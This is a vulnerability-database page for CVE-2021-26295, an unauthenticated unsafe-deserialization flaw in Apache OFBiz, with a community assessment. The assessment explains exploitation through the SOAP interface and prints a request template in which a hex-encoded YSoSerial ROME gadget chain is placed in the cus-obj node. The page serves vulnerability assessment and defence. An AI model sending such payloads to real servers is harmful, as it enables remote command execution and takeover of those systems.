Lucene search

K
attackerkbAttackerKBAKB:9A355845-4C8F-48C3-9829-4A54539E1FB8
HistoryMar 22, 2021 - 12:00 a.m.

CVE-2021-26295

2021-03-2200:00:00
attackerkb.com
64

0.975 High

EPSS

Percentile

100.0%

Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.

Recent assessments:

zeroSteiner at March 31, 2021 1:24pm UTC reported:

This vulnerability is pretty straightforward to exploit. It is due to an unauthenticated SOAP interface in the Apache OFBiz application that accepts and deserializes an arbitrary Java object. This can be leveraged by an attacker to submit a payload to the server that after being deserialized will result in a command being executed. The YSoSerial ROME gadget chain can be used for this purpose.

The serialized object is encoded in hex and placed within the cus-obj XML node of the SOAP request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body>
    <ser>
      <map-HashMap>
        <map-Entry>
          <map-Key>
            <cus-obj>$hexGadgetChain</cus-obj>
          </map-Key>
          <map-Value>
            <std-String value="http://example.com"/>
          </map-Value>
        </map-Entry>
      </map-HashMap>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>

This was taken from a PoC which was credited in the Metasploit exploit module.

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5

References